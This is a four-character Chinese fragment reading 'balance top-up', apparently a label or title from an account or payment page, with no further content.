余额充值